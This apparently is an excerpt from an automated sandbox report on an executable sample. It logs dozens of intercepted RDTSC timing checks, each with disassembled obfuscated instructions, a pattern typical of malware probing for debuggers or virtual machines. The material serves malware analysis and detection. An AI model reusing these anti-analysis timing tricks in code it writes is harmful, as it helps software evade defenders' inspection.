                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C042E1 second address: C0430F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4E5F538h 0x0000000b pushad 0x0000000c ja 00007F1BB4E5F526h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 push edi 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0430F second address: C04315 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C04315 second address: C04337 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jng 00007F1BB4E5F53Dh 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F1BB4E5F535h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C045CC second address: C045D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C045D2 second address: C045D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0715D second address: C07161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0B35D second address: C0B364 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0B364 second address: C0B36F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0B36F second address: C0B3AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jg 00007F1BB4E5F537h 0x00000015 pushad 0x00000016 jp 00007F1BB4E5F526h 0x0000001c jne 00007F1BB4E5F526h 0x00000022 push esi 0x00000023 pop esi 0x00000024 popad 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCD117 second address: BCD11B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCD9D9 second address: BCDA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pushad 0x00000006 push eax 0x00000007 pop eax 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000004h 0x0000000f push 00000000h 0x00000011 push ebp 0x00000012 call 00007F1BB4E5F528h 0x00000017 pop ebp 0x00000018 mov dword ptr [esp+04h], ebp 0x0000001c add dword ptr [esp+04h], 0000001Bh 0x00000024 inc ebp 0x00000025 push ebp 0x00000026 ret 0x00000027 pop ebp 0x00000028 ret 0x00000029 or dword ptr [ebp+122D28C1h], ecx 0x0000002f nop 0x00000030 push edi 0x00000031 jo 00007F1BB4E5F531h 0x00000037 jmp 00007F1BB4E5F52Bh 0x0000003c pop edi 0x0000003d push eax 0x0000003e push eax 0x0000003f push edx 0x00000040 jmp 00007F1BB4E5F531h 0x00000045 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCDA39 second address: BCDA3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0AA19 second address: C0AA27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnp 00007F1BB4E5F526h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0AEDF second address: C0AEEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 jbe 00007F1BB4D69EA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B9501A second address: B9501E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0FA25 second address: C0FA2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0FA2B second address: C0FA31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0FA31 second address: C0FA38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0FA38 second address: C0FA40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C0FA40 second address: C0FA44 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C1015D second address: C1017D instructions: 0x00000000 rdtsc 0x00000002 jc 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F1BB4E5F532h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C1017D second address: C10190 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EAFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C10460 second address: C1046B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F1BB4E5F526h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C1046B second address: C10482 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EB1h 0x00000009 push eax 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C10482 second address: C10488 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C10488 second address: C10491 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C10491 second address: C104C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F537h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F1BB4E5F52Ch 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push esi 0x00000017 pop esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C104C4 second address: C104C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C13369 second address: C13373 instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BB4E5F526h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C13373 second address: C13383 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F1BB4D69EB2h 0x00000008 jns 00007F1BB4D69EA6h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B96A7D second address: B96A89 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jns 00007F1BB4E5F526h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C166CD second address: C166D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C166D5 second address: C16722 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F538h 0x00000009 jmp 00007F1BB4E5F537h 0x0000000e jmp 00007F1BB4E5F534h 0x00000013 popad 0x00000014 push esi 0x00000015 push edx 0x00000016 pop edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B85C11 second address: B85C17 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B85C17 second address: B85C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 pop eax 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B85C21 second address: B85C3C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F1BB4D69EB6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B85C3C second address: B85C45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: B85C45 second address: B85C4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C18AD4 second address: C18AD8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C18702 second address: C18710 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F1BB4D69EA6h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C1B47C second address: C1B4A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F538h 0x00000007 jng 00007F1BB4E5F526h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 je 00007F1BB4E5F526h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C21C62 second address: C21C66 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C21C66 second address: C21C8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F531h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jmp 00007F1BB4E5F52Bh 0x00000011 pushad 0x00000012 popad 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C21C8C second address: C21C9C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EAAh 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C20852 second address: C2086F instructions: 0x00000000 rdtsc 0x00000002 je 00007F1BB4E5F537h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2086F second address: C20883 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4D69EB0h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C20C6E second address: C20C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F1BB4E5F530h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C20C83 second address: C20C9B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB1h 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCDBF9 second address: BCDC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push eax 0x0000000a call 00007F1BB4E5F528h 0x0000000f pop eax 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 add dword ptr [esp+04h], 00000017h 0x0000001c inc eax 0x0000001d push eax 0x0000001e ret 0x0000001f pop eax 0x00000020 ret 0x00000021 mov dword ptr [ebp+122D2E23h], ecx 0x00000027 mov dword ptr [ebp+1246AFE8h], edx 0x0000002d push 00000004h 0x0000002f push 00000000h 0x00000031 push esi 0x00000032 call 00007F1BB4E5F528h 0x00000037 pop esi 0x00000038 mov dword ptr [esp+04h], esi 0x0000003c add dword ptr [esp+04h], 0000001Ch 0x00000044 inc esi 0x00000045 push esi 0x00000046 ret 0x00000047 pop esi 0x00000048 ret 0x00000049 push ecx 0x0000004a mov ecx, esi 0x0000004c pop edx 0x0000004d nop 0x0000004e push eax 0x0000004f push edx 0x00000050 jg 00007F1BB4E5F52Ch 0x00000056 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24B66 second address: C24B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F1BB4D69EB0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D0F second address: C24D33 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F1BB4E5F52Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F1BB4E5F52Ah 0x00000011 jp 00007F1BB4E5F52Eh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D33 second address: C24D39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C24D39 second address: C24D4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F531h 0x00000007 push edi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C252E7 second address: C25303 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F1BB4D69EAEh 0x0000000a pop esi 0x0000000b jo 00007F1BB4D69EACh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28BBF second address: C28BC5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28BC5 second address: C28BD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007F1BB4D69EA8h 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28D2D second address: C28D32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28D32 second address: C28D42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F1BB4D69EACh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C28E8E second address: C28EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F1BB4E5F526h 0x0000000d jmp 00007F1BB4E5F536h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3054A second address: C30550 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C30550 second address: C30554 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCCF45 second address: BCCF49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: BCCF49 second address: BB5F48 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007F1BB4E5F528h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 mov dword ptr [ebp+122D2209h], esi 0x00000029 call dword ptr [ebp+122D21A7h] 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push ecx 0x00000034 pop ecx 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F107 second address: C2F122 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007F1BB4D69EA6h 0x00000009 jc 00007F1BB4D69EA6h 0x0000000f jo 00007F1BB4D69EA6h 0x00000015 push esi 0x00000016 pop esi 0x00000017 popad 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F122 second address: C2F128 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F96B second address: C2F99A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F1BB4D69EB6h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f jmp 00007F1BB4D69EAFh 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2F99A second address: C2F99E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FC5D second address: C2FC6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 je 00007F1BB4D69EAEh 0x0000000c push eax 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FC6D second address: C2FC74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF1C second address: C2FF29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF29 second address: C2FF38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ecx 0x00000006 pushad 0x00000007 jc 00007F1BB4E5F532h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF38 second address: C2FF3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C2FF3E second address: C2FF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C327F6 second address: C327FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C327FA second address: C32834 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4E5F52Eh 0x00000007 jmp 00007F1BB4E5F539h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F1BB4E5F52Dh 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C357A2 second address: C35811 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F1BB4D69EB1h 0x0000000b jmp 00007F1BB4D69EB2h 0x00000010 popad 0x00000011 pushad 0x00000012 jmp 00007F1BB4D69EB8h 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a pop edx 0x0000001b pushad 0x0000001c pushad 0x0000001d popad 0x0000001e jmp 00007F1BB4D69EB2h 0x00000023 popad 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F1BB4D69EB0h 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C3595B second address: C35965 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35AEC second address: C35B0B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EB5h 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F1BB4D69EA6h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35C6A second address: C35C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop esi 0x00000007 jo 00007F1BB4E5F532h 0x0000000d jp 00007F1BB4E5F526h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35C7F second address: C35CA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 push esi 0x00000007 jmp 00007F1BB4D69EB9h 0x0000000c push edx 0x0000000d pop edx 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35CA8 second address: C35CAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35E18 second address: C35E28 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F1BB4D69EACh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35E28 second address: C35E2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FAD second address: C35FB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FB1 second address: C35FB7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FB7 second address: C35FBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C35FBD second address: C35FC3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\fnCae9FQhg.exeRDTSC instruction interceptor: First address: C362B4 second address: C362BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
